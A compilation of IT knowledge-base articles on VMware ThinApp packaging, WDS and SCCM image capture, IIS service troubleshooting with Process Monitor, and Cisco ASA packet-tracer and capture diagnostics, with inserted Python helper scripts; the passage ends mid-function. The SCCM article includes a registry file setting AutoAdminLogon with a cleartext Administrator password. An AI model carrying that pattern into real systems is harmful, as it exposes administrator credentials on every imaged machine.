Deploying Applications with VMware ThinApp

KB ID 0000612

Problem

ThinApp is an “odd” VMware product, insofar as it’s got nothing to do with virtual machines or virtualisation. It’s a product that turns applications into “stand alone” thin applications, which can be sent to a user and run without that user needing administrative access, or needing to install anything.

ThinApp was a product called Thinstall that VMware purchased and “re-badged”; you get a free copy with VMware View 5 (Premier Edition), and it ships with a copy of VMware Workstation. (Not because it needs one, but VMware recommends you create your ThinApps on a clean virtual machine.)

If you’ve ever used sysdiff in the past or Novell Zenworks for Desktops, you will be familiar with the process, take a ‘scan’ of a clean machine, then install application(s), then carry out another ‘scan’. The software then works out the ‘difference’ and uses that information to build a software package.

In the example below I’m going to create a stand alone version of Google Chrome that is pre-configured and has Java already installed, and deploy it as a single executable file. Bear in mind that the versions of Chrome and Java you capture are the versions that get deployed; the package does not update itself, so plan to rebuild it (or use ThinApp’s AppSync) when security patches come out.

Solution

1. It’s recommended that you create your ThinApp on the oldest operating system that it might be deployed on, so here I’m creating a virtual machine in VMware workstation that’s running Windows XP.

2. When built remove any hardware that will not be needed, like the floppy drive, and the USB Controller (Edit > Settings).

3. Installing ThinApp is pretty straightforward, simply run the executable and follow the on screen prompts. The only thing to note is that when you enter your licence key, the name you enter will display on the “splash screen” as your ThinApp loads (as shown).

4. Once your reference machine is setup, take a snapshot of it, so you can roll back to this point to create further ThinApps on this clean machine (VM > Snapshot > Take Snapshot).

5. Run the ThinApp Setup Capture > Next > Prescan > This will take a few minutes > When finished simply minimise the window you are finished with it for now. Note: Don’t worry if the application you are installing requires a reboot, ThinApp is clever enough to cope with that.

6. Now install and configure the application you require, in this case Google Chrome. I’m also installing Java, and setting the default homepage to the Google search page.

7. When the application is installed to your liking, maximise (or open the capture if you’ve rebooted) and select ‘Postscan’ > OK.

Note: Before running Postscan make sure you delete any installer files downloaded, any icons from the desktop you do not want deployed in the ThinApp, and empty the recycle bin (you don’t want all that stuff captured, when creating your ThinApp).

8. Make sure only the executable you require is ticked as an entry point > Next > At the Horizon Application Manager page > Next.

9. In a domain environment you can restrict ThinApp access to particular users or groups > Next.

10. Set the isolation mode as required, for most cases it will be ‘Full’ > Next. Note: ‘Full’ (full write access to non-system directories, i.e. Merged mode) lets the packaged application write to the real file system outside its sandbox; if the application does not need to, the restricted (WriteCopy) option keeps its changes inside the sandbox and is the safer choice.

11. Select the option to store the sandbox in the user profile > Next > Select whether you want to provide statistics to VMware > Next.

12. You will see this screen ONLY if you are capturing a browser. It is used when you have a particular website that will only run in IE6, Firefox etc. Only URLs listed here (whether entered directly or followed from a hyperlink) are opened by the ThinApp browser; all other URLs are opened by the default browser. It’s a cool feature but not one I’m using > Next.

13. Give your ThinApp a name > Next.

14. I’m choosing the option to embed everything into my executable. Selecting this may cause a warning about icons, but I ignored it and deployed with no problems > Save.

Note: You can use this page to create an MSI file to deploy via group policy if you wish.

15. After ThinApp generates the files it needs > Build.

16. Finish

17. Here’s my ThinApp executable file.

18. To test I’ve copied it to a Windows 7 machine.

19. While it’s loading this is what you will see.

20. And here is my ThinApp version of Google Chrome running and pre configured.

Related Articles, References, Credits, or External Links

NA

Creating and Deploying USB Portable Applications with VMware ThinApp

KB ID 0000616 

Problem

The last time I wrote about deploying applications with ThinApp, it was geared towards getting standalone applications onto client PCs for non-admins to run, or putting them on a network share. But if you have a portable application, the advantage is that you can run it from portable media (like a USB drive).

Like before I’ll convert Google Chrome to a ThinApp, but the difference is I will set the applications ‘sandbox’ to live in the same location (on the USB). Then I’ll try it out on a different machine.

Solution

1.  It’s recommended that you create your ThinApp on the oldest operating system that it might be deployed on, so here I’m creating a virtual machine in VMware workstation that’s running Windows XP.

2.  When built remove any hardware that will not be needed, like the floppy drive, and the USB Controller (Edit > Settings).

3. Installing ThinApp is pretty straightforward, simply run the executable and follow the on screen prompts. The only thing to note is that when you enter your licence key, the name you enter will display on the “splash screen” as your ThinApp loads.

4. Once your reference machine is setup, take a snapshot of it, so you can roll back to this point to create further ThinApps on this clean machine (VM > Snapshot > Take Snapshot).

5. Run the ThinApp Setup Capture > Next.

6. Prescan > This will take a few minutes > When finished simply minimise the window you are finished with it for now. Note: Don’t worry if the application you are installing requires a reboot, ThinApp is clever enough to cope with that.

7. Now install and configure the application you require, in this case Google Chrome. I’m also installing Java, and setting the default homepage to the Google search page.

8. When the application is installed to your liking, maximise (or open the capture if you’ve rebooted) and select ‘Postscan’ > OK.

Note: Before running Postscan make sure you delete any installer files downloaded, any icons from the desktop you do not want deployed in the ThinApp, and empty the recycle bin (you don’t want all that stuff captured, when creating your ThinApp).

9. Make sure only the executable you require is ticked as an entry point > Next.

10. At the Horizon App Manage Page > Next.

11. In a domain environment you can restrict ThinApp access to particular users or groups > Next.

12. Set the isolation mode as required, for most cases it will be ‘Full’ > Next.

13. As you are storing the app on USB I’d suggest (though you don’t have to) setting the application to save its sandbox in the same directory. Bear in mind the sandbox is where the application’s writes land, so with Chrome that means browsing history, cache and any saved passwords travel around on the USB stick with the application; treat the stick accordingly.

14. Select whether you want to provide statistics to VMware > Next.

15. You will see this screen ONLY if you are capturing a browser. It is used when you have a particular website that will only run in IE6, Firefox etc. Only URLs listed here (whether entered directly or followed from a hyperlink) are opened by the ThinApp browser; all other URLs are opened by the default browser. It’s a cool feature but not one I’m using > Next.

16. Give your ThinApp a name > Next.

17. I’m choosing the option to embed everything into my executable. Selecting this may cause a warning about icons, but I ignored it and deployed with no problems > Save.

18. After ThinApp generates the files it needs > Build.

19. Finish.

20. Here’s my ThinApp executable file.

21. Which I’ve copied to my USB Drive.

22. So when I use the drive in another machine.

23. You can simply run the executable.

24. While the app loads it will show a splash screen like this.

25. And should load pre-configured.

 

Related Articles, References, Credits, or External Links

NA

World Wide Web Service Won’t Start, Because Windows Process Activation Service Won’t Start.

KB ID 0000878

Problem

This problem started when a client attempted to add a ‘distribution point’ for System Center onto the server. This process failed, then Outlook Web Access stopped working. First-line support found that the World Wide Web Publishing service was not running; when they attempted to start it, this happened;

Windows could not start the World Wide Web Publishing Service
service on Local Computer.
Error 1068: The dependency service or group failed to start.

Fair enough, the dependency in question was the Windows Process Activation Service. When they attempted to start that, this happened;

Windows could not start the Windows Process Activation Service
service on Local Computer.
Error 183: Cannot create a file when that file already exists.

Solution

This was a nightmare of a problem to troubleshoot, and IIS architecture is not my subject of choice. I was pretty much convinced the error was in a config file or a setting had been changed but where?

I restored the IIS config files from the servers own backup, and from before the error started, still the services refused to start.

Time to spin up Process Monitor. If you’re unfamiliar with Process Monitor, it is to Windows what Wireshark is to network traffic. Here I’m using it to get a ‘snapshot’ of everything that’s going on when the error occurs.

1. Run Process Monitor > Start it capturing data > Attempt to start the Windows Process Activation Service > Wait for the error > Stop the capture.

2. You will have a LOT of data, so let’s narrow it down. On the properties of the service you can see that, to launch, it runs ‘svchost.exe -k iissvcs’. Add in the Command Line column, then add a filter to show only results for that command line.

3. Normally at this point you would go through the Result column and look for errors, e.g. access denied, not found, etc., but they all looked OK. However it was apparent that it was parsing the WebDAV_schema.xml file as it should, but before it did that it was also reading WebDAV_schema – Copy.xml.

The copy was ‘moved elsewhere’.

4. At this point, the good folk at Microsoft came back and said they had been through the applicationHost.config file and the bindings ‘didn’t look right either’. So we took a backup.

5. The bindings for port 80 (http) and 443 (https) were set to the default.

At this point the services could be started without error, and the problem was resolved.
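The filtering above is done by eye in the Process Monitor GUI. As an added example (not part of the original article), the script below does the same triage over a ProcMon CSV export: narrow the events to the svchost instance that hosts the service, pull out anything that did not return SUCCESS, and then list every file the process opened under the IIS config\schema directory, flagging names that look like stray copies, since IIS parses every XML file it finds there. The CSV text is constructed for this example; its header matches a ProcMon export with the Command Line column added, and the registry path in it is made up.

```python
"""Triage a Process Monitor CSV export for a service that will not start.

Added example (not the article's own code).  It does what the article does
in the ProcMon GUI (narrow the capture to the svchost instance hosting the
service and read the Result column) and adds the check the article's root
cause suggests: list every file the process opens under the IIS
config\\schema directory and flag names that look like stray copies.
The CSV below is constructed for this example; its header matches a ProcMon
export with the Command Line column added.
"""
import csv
import io

SCHEMA_DIR = "c:\\windows\\system32\\inetsrv\\config\\schema\\"
# Name fragments that usually mean "someone left a backup next to the real file"
COPY_MARKERS = (" - copy", "copy of ", ".bak", ".old", ".orig", "(1)")


def load_events(csv_text: str) -> list[dict]:
    """Parse a ProcMon CSV export into one dict per event, keyed by column name."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def for_command_line(events: list[dict], needle: str) -> list[dict]:
    """Keep events from processes whose command line contains `needle` (case-insensitive)."""
    needle = needle.lower()
    return [e for e in events if needle in e.get("Command Line", "").lower()]


def failures(events: list[dict]) -> list[tuple[str, str, str]]:
    """(Operation, Path, Result) for everything that did not return SUCCESS."""
    return [(e["Operation"], e["Path"], e["Result"]) for e in events if e["Result"] != "SUCCESS"]


def schema_files(events: list[dict]) -> list[str]:
    """Distinct files touched under the IIS schema directory, in first-seen order."""
    seen: list[str] = []
    for e in events:
        path = e["Path"]
        if path.lower().startswith(SCHEMA_DIR) and path not in seen:
            seen.append(path)
    return seen


def stray_schema_files(events: list[dict]) -> list[str]:
    """Schema files whose file name looks like a leftover copy or backup."""
    return [p for p in schema_files(events)
            if any(marker in p.rsplit("\\", 1)[-1].lower() for marker in COPY_MARKERS)]


def triage(csv_text: str, command_line_needle: str) -> dict:
    """Run all three checks for the process matching `command_line_needle`."""
    events = for_command_line(load_events(csv_text), command_line_needle)
    return {
        "events": len(events),
        "failures": failures(events),
        "schema_files": schema_files(events),
        "stray_schema_files": stray_schema_files(events),
    }


# Constructed sample export: the iissvcs svchost reads the schema directory
# (including a stray " - Copy" file), misses one registry key, and an
# unrelated explorer.exe event is there to show the command-line filter working.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail","Command Line"
"10:15:01.0000001","svchost.exe","1456","CreateFile","C:\Windows\System32\inetsrv\config\schema\IIS_schema.xml","SUCCESS","Desired Access: Generic Read","C:\Windows\system32\svchost.exe -k iissvcs"
"10:15:01.0000002","svchost.exe","1456","CreateFile","C:\Windows\System32\inetsrv\config\schema\WebDAV_schema - Copy.xml","SUCCESS","Desired Access: Generic Read","C:\Windows\system32\svchost.exe -k iissvcs"
"10:15:01.0000003","svchost.exe","1456","CreateFile","C:\Windows\System32\inetsrv\config\schema\WebDAV_schema.xml","SUCCESS","Desired Access: Generic Read","C:\Windows\system32\svchost.exe -k iissvcs"
"10:15:01.0000004","svchost.exe","1456","RegOpenKey","HKLM\SOFTWARE\Microsoft\InetStp\Components","NAME NOT FOUND","Desired Access: Read","C:\Windows\system32\svchost.exe -k iissvcs"
"10:15:01.0000005","svchost.exe","1456","CreateFile","C:\Windows\System32\inetsrv\config\applicationHost.config","SUCCESS","Desired Access: Generic Read","C:\Windows\system32\svchost.exe -k iissvcs"
"10:15:01.0000006","explorer.exe","812","CreateFile","C:\Users\pete\Desktop\notes.txt","SUCCESS","Desired Access: Generic Read","C:\Windows\Explorer.EXE"
'''

if __name__ == "__main__":
    result = triage(SAMPLE_CSV, "-k iissvcs")
    print(f"{result['events']} events for the iissvcs svchost")
    print("non-SUCCESS results:", result["failures"])
    print("schema files read:", result["schema_files"])
    print("suspicious schema files:", result["stray_schema_files"])
```

To use it against a real capture, export from Process Monitor as CSV (File > Save, CSV format) with the Command Line column added, read the file into a string and call `triage(text, "-k iissvcs")`. A non-SUCCESS result is not automatically the cause (NAME NOT FOUND on an optional registry key is normal), which is why the schema-directory listing is worth reading even when the Result column looks clean, as it did in this case.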

Conclusion

Which of the two changes fixed the problem? The honest answer is “I don’t know”; what I do know is there was nothing I could find on the internet that helped in any way. As I had a backup of the applicationHost.config file I could compare the two to see what Microsoft meant by the bindings ‘not looking right’.

 

Related Articles, References, Credits, or External Links

Kudos to Mark Russinovich and Bryce Cogswell for Process Monitor

WDS Deploying Windows Part 2: Prepare Windows, and Capture to WDS

KB ID 0000737

Problem

In part one we built and configured the WDS Server. Now you need to prepare the reference Windows 8 machine so that you can ‘capture’ its image.

Solution

Before you start, make sure that the machine you are imaging has PLENTY of room on one of its local drive(s), because it copies the image locally, before it sends it to WDS.

Place Your Reference Windows 8 Machine in Audit Mode

To put all the software on your reference machine and configure it how you like, the machine needs to be in ‘Audit Mode’ before you start. There are TWO ways to put the machine into audit mode.

Note: While a machine is in audit mode, it will log on automatically as the Administrator, and every time the machine boots sysprep will launch (in anticipation of you needing it).

Option 1: A Newly Built Machine

1. When you have first built the Windows 8 machine, you will see the screen below, Press CTRL+SHIFT+F3, the machine will automatically reboot and enter audit mode.

Option 2: You Are Already in Windows

2. You can also put a Windows 8 machine into audit mode by running the sysprep executable (%WINDIR%\System32\Sysprep\sysprep.exe) with the /audit switch.

3. Once in Audit mode, install all the program and configure all the settings you want in your master image. When you are happy run the sysprep program, (Or simply reboot, as sysprep launches at every boot when you are in audit mode).

4. Tick the ‘Generalize’ option, select either shutdown or reboot. (If you choose reboot make sure the machine is ready to PXE boot from the network, and the boot order has the NIC BEFORE the hard drive, or sysprep will start and rebuild the machine before it’s imaged.)

5. Sysprep will run, and shutdown or reboot as requested.

6. When the machine boots press F12 to boot from the WDS server.

7. Note: Now you can see why (in part one) we gave the capture boot image the name ‘Capture an Image’. Select the capture option.

8. WindowsPE will run at the welcome screen > Next,

Note: If the process fails at this point, usually it’s because the network card driver for this machine IS NOT in the boot image.

Adding Drivers to Images on Windows Deployment Services

9. Select the volume that you want to image, (Note: It will NOT be C: that’s reserved, usually it’s D:) > Give the image a name, this is the name you will see in the WDS console, and when you are imaging the target machines > Enter a comment/description > Next.

10. Browse.

11. Navigate to a local drive, and give the image a name with a .wim extension > Save.

12. Tick the box to upload the image > Supply IP/Name of the WDS server > Connect.

13. Supply credentials to log onto the WDS server > OK.

14. Once authenticated you can select the image group we setup in part one > Next.

15. The image will be created on the reference machine.

16. Then it will be uploaded to the WDS Server.

17. When complete click Finish. At this point the reference machine will reboot and rebuild itself.

18. Back in the Windows Deployment Services management console you will see the image you have just uploaded in your image group.

Note: Sometimes it can take a while to appear, be patient!

Related Articles, References, Credits, or External Links

2012 – WDS Deploying Windows 8 Part 3: Carry Out a Windows 8 Unattended Deployment

2012 – WDS Deploying Windows 8 Part 1: Install and Configure WDS

 

SCCM OSD Capture a Windows 7 Reference Machine

KB ID 0000302 

Problem

You have a reference machine (physical or virtual), and you want to capture an image of that machine to your System Center Configuration Manager 2007 infrastructure, so you can then deploy that image to multiple machines.

Solution

Prerequisites

1. SCCM needs to be installed and configured.

2. Download the Task and Registry File in Zip Format (Edit the .reg file with notepad to enter the correct administrator password see below).

3. Create a SHARE on your network to hold the images and files > and grant full control to your sccadmin user.

4. Windows and application media that is either “Volume Licensed” or “Multiple Activation Licensed”.

5. Your Windows 7 reference machine needs the local Administrator account enabling, and the local Administrator’s password changing to match the password in the registry file you downloaded above (in the example below, Password123). Note that this puts the local Administrator password in the registry in clear text, and unless you remove these values before the capture they end up in the image; change the local Administrator password (and turn AutoAdminLogon off) on the deployed machines.

[box]

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
"DefaultUserName"="Administrator"
"DefaultPassword"="Password123"

[/box]

Step 1: SCCM Put your Reference Machine into a Collection

1. Open the SCCM Manager > Expand Site Database > Computer Management > Collections > Right Click > New Collection > Call It “Image Reference Machine” > Next.

2. Next > Click the small computer Icon to add a rule > Next > Change the Resource Class to “System Resource” > Change the attribute name to “Name” > Enter the reference machines Name.

3. Supply the “All systems” Collection > Next.

4. Select your Reference Machine > Next

5. Set the schedule so it occurs 5 minutes in the future > OK > Next > Next > Finish.

6. When finished you should have your Reference Machine in the Collection.

 

Step 2: SCCM Create an “AutoLogon Package”

1. Open the SCCM Manager > Expand Site Database > Computer Management > Software Distribution > Right Click > New > Package > Call it AutoLogon > Next.

2. Tick “This Task contains source files” > Put in the path to share containing the AutoLogon.reg file > Next.

3. Next > Next > Next > Next > Next > Close

4. Expand Your AutoLogon Package > Programs > Right Click > New > Program > Call it “AutoLogon” > In the Command Line Section enter reg import “AutoLogon.reg” > Next.

5. Next > In the Environment section change the “Program Can Run” setting to “Whether or not a User is Logged on” > Tick Run with Administrative rights > Tick “Runs with UNC Name” > Next.

6. Next > Next > Next > Next > Close.

7. Expand your AutoLogon Package > Distribution Points > Right Click > New Distribution Point > Next > Tick the Server > Next > Close.

8. Extract the AutoLogon.reg file to the location you specified in number 2 above.

 

Step 3: SCCM Import the “Windows 7 Import Task”

1. Extract the Windows7_Capture_Task.xml file to the Desktop.

2. Launch the SCCM Manager > Expand > Site Database > Computer Management > Operating System Deployment > Task Sequences > Right Click > Import > Select the Windows7_Capture_Task.xml from your desktop.

3. You Will be asked if you want to Edit the Task Select Yes > Under “Autologin Via Registry” Select the Package you created in Step 2 above.

4. In the Capture The Reference Machine section > Set the network share you want to save the image in > Set an account (note the format DOMAINNAME\username); that account MUST have permissions to the network share, and ideally is a dedicated account that has rights to nothing else > Apply > OK.

5. Right Click the Task you have just imported > Properties > Advanced > Tick “Use Boot Image” > Select either the x86 or x64 (to match your reference machine) > Apply > OK.

6. Right Click the Task you have just imported > Advertise > Under Collection Set your “Reference Image Machine” > Next.

7. Next > Next > Next > Next > Close.

 

Step 6: SCCM Send the Boot Media to Distribution

1. Launch the SCCM Manager > Expand > Site Database > Computer Management > Operating System Deployment > Boot Images > Boot Image (x86) > Distribution Points > Right Click > New Distribution Points > Next.

2. Select the Server share > Next

3. Check the settings > Next.

4. Repeat the above for the Boot Image x64.

Step 7: SCCM Create Task Sequence Media

1. Right click the Task you have created > Create Task Sequence Media.

2. Capture Media > Next.

3. Save the ISO image to the network share you created earlier.

 

Step 8: SCCM Perform the Capture

1. Boot Your Windows 7 Reference Machine > Start > Control Panel > Run Advertised Programs > Select “Windows 7 Capture Task” (If it’s not there, reboot and apply the cup of coffee rule) > Run > Yes.

2. The machine will reboot then “Prepare ConfigMgr Client.”

3. Then it will run sysprep.

4. Then it will reboot again, sccm will launch.

5. The Machine will start to capture.

6. Capturing can take a LONG! time

7. When finished the machine will reboot and (because its been sysprepped) will rebuild itself.

8. Your Image file will be in the network share you defined in step xx above with the name you specified in step xx above

 

Related Articles, References, Credits, or External Links

Install SCCM 2007 on Windows Server 2008 R2 – Step by Step

SCCM 2007 Initial Setup and Configuration

Cisco ASA – I Cannot Ping External Addresses? (Troubleshooting ICMP)

KB ID 0000914 

Problem

Considering we use ICMP to test connectivity, the fact that it is not a stateful protocol can be a major pain! Last week one of my colleagues rang me up and said, “Can you jump on this firewall, I’ve got no comms, and I cant ping external IP addresses. I can ping the internet from the firewall and I can ping internal IP addresses form the firewall”.

Solution

1. Before we start, lets get the basics out of the way, does the client you are pinging from have a firewall turned on? Can you ping the inside interface of the firewall?

2. Pinging through the firewall will never work unless you have ICMP inspection turned on. See the following article.

Cisco Firewalls and PING

Using Packet-Tracer to Test Ping/ICMP

3. At this point we troubleshoot as we would for any other traffic through the firewall. To do this we use packet-tracer; the syntax is slightly different for ICMP than it is for TCP and UDP though. We need to specify an ICMP type and an ICMP code: to make sure the traffic leaves the firewall we trace ICMP type 8 (echo) with code 0, and for the traffic coming back in we trace ICMP type 0 (echo reply) with code 0.

ICMP Types and Codes

[box]

Test Outbound Ping

Petes-ASA# packet-tracer input inside icmp 192.168.1.1 8 0 4.2.2.2

Testing Inbound Ping (where 123.123.123.123 is the public IP you are mapped to)

Petes-ASA# packet-tracer input outside icmp 4.2.2.2 0 0 123.123.123.123

[/box]

Note: You need to use the public addresses or this will happen.

4. Make sure the client you are on is getting NATTED or PATTED through the firewall. Below we will assume my internal IP address is 192.168.1.1.

Note: If you have names enabled and 192.168.1.1 has a name, you will get no results! Issue a no names command from configure terminal mode to check.

[box]

Petes-ASA# show xlate | incl 192.168.1.1

If this machine was being NATTED to another public IP address it would look like..

NAT from inside:192.168.1.1 to outside:123.123.123.124

If this machine was being PATTED to a public IP address it would look like..

ICMP PAT from inside:192.168.1.1/1 to outside:123.123.123.123/1 flags ri idle 0:00:07 timeout 0:00:30

[/box]

If it fails at this stage then check your network translation configuration on the firewall.

5. If all appears normal so far you can capture the traffic as it passes through the firewall. Below I’m successfully capturing the ICMP traffic through the firewall.

[box]

Petes-ASA# configure terminal
Petes-ASA(config)# capture capout interface inside match icmp host 192.168.1.1 any
Petes-ASA(config)# capture capin interface outside match icmp host 4.2.2.2 any

At this point attempt to ping, so some traffic is captured

Petes-ASA(config)# show capture capout

8 packets captured

1: 12:56:51.089244 192.168.1.1 > 4.2.2.2: icmp: echo request
2: 12:56:51.104410 4.2.2.2 > 192.168.1.1: icmp: echo reply
3: 12:56:52.092829 192.168.1.1 > 4.2.2.2: icmp: echo request
4: 12:56:52.108926 4.2.2.2 > 192.168.1.1: icmp: echo reply
5: 12:56:53.098688 192.168.1.1 > 4.2.2.2: icmp: echo request
6: 12:56:53.113809 4.2.2.2 > 192.168.1.1: icmp: echo reply
7: 12:56:54.105463 192.168.1.1 > 4.2.2.2: icmp: echo request
8: 12:56:54.120263 4.2.2.2 > 192.168.1.1: icmp: echo reply

Petes-ASA(config)# show capture capin

8 packets captured

1: 12:57:28.170981 123.123.123.123 > 4.2.2.2: icmp: echo request
2: 12:57:28.185949 4.2.2.2 > 123.123.123.123: icmp: echo reply
3: 12:57:29.175238 123.123.123.123 > 4.2.2.2: icmp: echo request
4: 12:57:29.190084 4.2.2.2 > 123.123.123.123: icmp: echo reply
5: 12:57:30.180212 123.123.123.123 > 4.2.2.2: icmp: echo request
6: 12:57:30.195500 4.2.2.2 > 123.123.123.123: icmp: echo reply
7: 12:57:31.186101 123.123.123.123 > 4.2.2.2: icmp: echo request
8: 12:57:31.201680 4.2.2.2 > 123.123.123.123: icmp: echo reply
8 packets shown

[/box]

Note: If your capout capture looks like the following, then you didn’t have inspect icmp enabled on your policy-map.

[box]

Petes-ASA(config)# show capture capout

4 packets captured

1: 13:02:33.285309 192.168.1.1 > 4.2.2.2: icmp: echo request
2: 13:02:37.886596 192.168.1.1 > 4.2.2.2: icmp: echo request
3: 13:02:42.886672 192.168.1.1 > 4.2.2.2: icmp: echo request
4: 13:02:47.888198 192.168.1.1 > 4.2.2.2: icmp: echo request
4 packets shown

[/box]

How Do I Clear or Delete a Cisco ASA Capture?

[box]

To clear a Capture, but leave it running;

Petes-ASA(config)# clear capture capin
Petes-ASA(config)# clear capture capout
Petes-ASA(config)# show capture capin

0 packet captured

0 packet shown
Petes-ASA(config)# show capture capout

0 packet captured

0 packet shown

To Delete a Capture;

Petes-ASA(config)# no capture capout
Petes-ASA(config)# no capture capin  

[/box]

Related Articles, References, Credits, or External Links

Cisco Firewalls and PING

Cisco ASA 5500 Allowing Tracert

 

Cisco ASA – ‘Prove it’s Not The Firewall!’

KB ID 0001049 

Problem

Yeah, it’s funny because it’s true! The article title might not sound like the most professional approach, but when the ‘Well it’s not working now’ finger gets pointed at the ‘firewall guy/girl’, they need to ascertain two things;

1. Is the problem actually the firewall, if not then help the frustrated party track down the actual problem.

2. If your problem IS the firewall, fix it!

I’m just coming out of a major network greenfield site build, all the individual technologies that have been getting planned and designed are now starting to come online and require comms though the firewall solution that I’ve been working on. So my days are pretty much filled with conversations like this;

Consultant/Engineer: Pete I need some ports opening on the firewall.
Me: OK let me know the IP addresses, host-names, ports, protocols etc, and I’ll open them for you.
I then open the requested ports/protocols.
Consultant/Engineer: You know those ports you opened? They don’t work.

At this point one of the following has occurred;

1. I’ve made an error, (it happens I’m human), I might have entered the wrong information, or not applied an ACL, or put the rule on the wrong firewall. Always assume you have done something wrong, until you are 100% sure that’s not the case.

2. The person who asked for traffic to be allowed, asked for the wrong thing, either they didn’t RTFM, or someone has given them the wrong IP addresses, or because they are human too, they’ve made a mistake.

3. The traffics not even getting to the firewall, because either it’s getting blocked before it gets to you, or there is a routing problem stopping the traffic hitting the firewall. (Remember routing works by Unicorns and Magic, so routing people are not to be trusted!)

4. The traffic needs some kind of special inspection to work through the firewall i.e. ICMP, FTP, or PPTP etc.

5. Some annoying bug in the ASA code is stopping you, which either requires a lot of Internet and forum searching or a call to TAC to confirm.

If I’ve forgotten another reason – feel free to contact me. (Link at the bottom of the page).

Solution

Step 1: Make sure you are not blocking the Traffic

Packet tracer is your friend! Use it to simulate traffic going though the firewall, and the firewall will tell you what it will do with that traffic. I prefer to use command line, but you can also run packet tracer graphically in the ASDM.

Packet Tracer Graphically

1. From the ASDM > Tools > Packet Tracer.

2. Enter the details and click start, if the firewall is blocking the traffic this should tell you where and why.

Packet-Tracer From Command Line (v7.2(1) and upwards)

Syntax

[box]packet-tracer input source_interface protocol source_address source_port destination_address destination_port [detailed] [xml] [/box]

Syntax Description

  • Source_interface: Specifies the source interface name for the packet trace.
  • Protocol: Protocol type for the packet trace. e.g. icmp, tcp, or udp.
  • Source_address: The IP address for the host thats sending the traffic to be tested.
  • Source_port: Source port (any port will do; it’s usually the destination port that matters).
  • Destination_address: The IP address for the host that traffic is being sent to.
  • Destination_port: The port that you are testing.
  • Detailed: (Optional) Provides detailed packet trace information.
  • Xml: (Optional) Displays the trace capture in XML format.

Example

Below I’m checking that an internal host (10.254.254.5) can get access to a public web server (123.123.123.123) via HTTP (TCP port 80). Note: As mentioned above, I just picked a random source port (1024).

OK, so if packet-tracer shows the firewall is not blocking the traffic, then either there are other ports we don’t know about that may need opening, or the traffic is not getting to the firewall. Normally at this point I’d test to see if the traffic is getting to the firewall. To do that I would do a packet capture.

To demonstrate, below someone has requested that we open https from Server A on our LAN, to an Internet server Server B.

 

[box]

Petes-ASA# configure terminal
Petes-ASA(config)# capture capout interface inside match tcp host 10.0.0.1 host 123.123.123.123 eq 443

[/box]

Send some traffic!

[box] Petes-ASA(config)# show capture capout

0 packet captured

0 packet shown
Petes-ASA(config)#

[/box]

Above the traffic is not getting to the firewall as there’s a problem between Server A and the Firewall, either something is blocking the traffic downstream, or Server A cannot route traffic to the firewall.

Below we can see traffic hitting the firewall, in fact 10.0.0.1 sends out three packets on TCP port 443 (https). What we CANNOT SEE is any traffic coming back, in this case Server B is not replying to us, either its down or it cannot route traffic back to us.

[box] Petes-ASA(config)# show capture capout

3 packets captured

1: 20:28:47.165976 10.0.0.1.1061 > 123.123.123.123.443: S 1762767908:1762767908(0) win 64240 <mss 1460,nop,nop,sackOK>
2: 20:28:50.214649 10.0.0.1.1061 > 123.123.123.123.443: S 1762767908:1762767908(0) win 64240 <mss 1460,nop,nop,sackOK>
3: 20:28:56.168951 10.0.0.1.1061 > 123.123.123.123.443: S 1762767908:1762767908(0) win 64240 <mss 1460,nop,nop,sackOK>
3 packets shown
Petes-ASA(config)#

[/box]

Here is an example of what you should see;

[box]Petes-ASA(config)# show capture capout

11 packets captured

1: 20:34:49.575806 10.0.0.1.1063 > 123.123.123.123.443: S 4084340501:4084340501(0) win 64240 <mss 1460,nop,nop,sackOK>
2: 20:34:49.576828 123.123.123.123.443 > 10.0.0.1.1063: S 4235939008:4235939008(0) ack 4084340502 win 64240 <mss 1380,nop,nop,sackOK>
3: 20:34:49.577820 10.0.0.1.1063 > 123.123.123.123.443: . ack 4235939009 win 64240
4: 20:34:49.578812 10.0.0.1.1063 > 123.123.123.123.443: P 4084340502:4084340579(77) ack 4235939009 win 64240
5: 20:34:49.582825 123.123.123.123.443 > 10.0.0.1.1063: P 4235939009:4235940127(1118) ack 4084340579 win 64163
6: 20:34:49.583816 10.0.0.1.1063 > 123.123.123.123.443: P 4084340579:4084340761(182) ack 4235940127 win 63122
7: 20:34:49.584823 123.123.123.123.443 > 10.0.0.1.1063: P 4235940127:4235940170(43) ack 4084340761 win 63981
8: 20:34:49.804783 10.0.0.1.1063 > 123.123.123.123.443: . ack 4235940170 win 63079
9: 20:35:20.378322 10.0.0.1.1063 > 123.123.123.123.443: F 4084340761:4084340761(0) ack 4235940170 win 63079
10: 20:35:20.379344 123.123.123.123.443 > 10.0.0.1.1063: . ack 4084340762 win 63981
11: 20:35:20.379405 123.123.123.123.443 > 10.0.0.1.1063: R 4235940170:4235940170(0) ack 4084340762 win 0
11 packets shown
Petes-ASA(config)#

[/box]
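Reading a capture by eye is fine for three packets, but the same three outcomes come up over and over (nothing captured, requests with no replies, a complete exchange), and the ICMP captures in the previous article are the same check with echo requests and echo replies in place of SYN and SYN-ACK. The following is an added Python example, not part of the original article, that parses the text of show capture and reports which case applies. The sample captures are copied (trimmed) from the article output above; the parser assumes the plain ASA capture line format shown there, without the ‘detail’ keyword.

```python
"""Classify the text of a Cisco ASA 'show capture <name>' command.

Added example (not the article's own code).  Three outcomes matter when
you are proving it is not the firewall:
  * nothing captured       -> the traffic never reached this interface
  * requests, no replies   -> the far end (or the return path) is the problem
  * a full exchange        -> this port/protocol works through the firewall
The samples below are copied (trimmed) from the article's captures; the
parser assumes the plain capture line format shown there.
"""
import re
from dataclasses import dataclass
from typing import Optional

# e.g. "1: 20:28:47.165976 10.0.0.1.1061 > 123.123.123.123.443: S 1762767908:1762767908(0) win 64240 ..."
# or   "1: 12:56:51.089244 192.168.1.1 > 4.2.2.2: icmp: echo request"
LINE_RE = re.compile(
    r"^\s*(?P<num>\d+):\s+(?P<ts>\d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(?P<src>\S+)\s+>\s+(?P<dst>\S+):\s+(?P<rest>.*)$"
)


@dataclass
class Packet:
    src: str          # endpoint exactly as the ASA prints it (IP, or IP.port for TCP)
    dst: str
    proto: str        # "icmp" or "tcp"
    detail: str       # icmp: "echo request"/"echo reply"; tcp: flag letters ("S", ".", "P", "F", "R")
    is_ack: bool      # tcp only: the segment carries an ACK ("S" with is_ack is a SYN-ACK)


def split_endpoint(endpoint: str) -> tuple[str, Optional[int]]:
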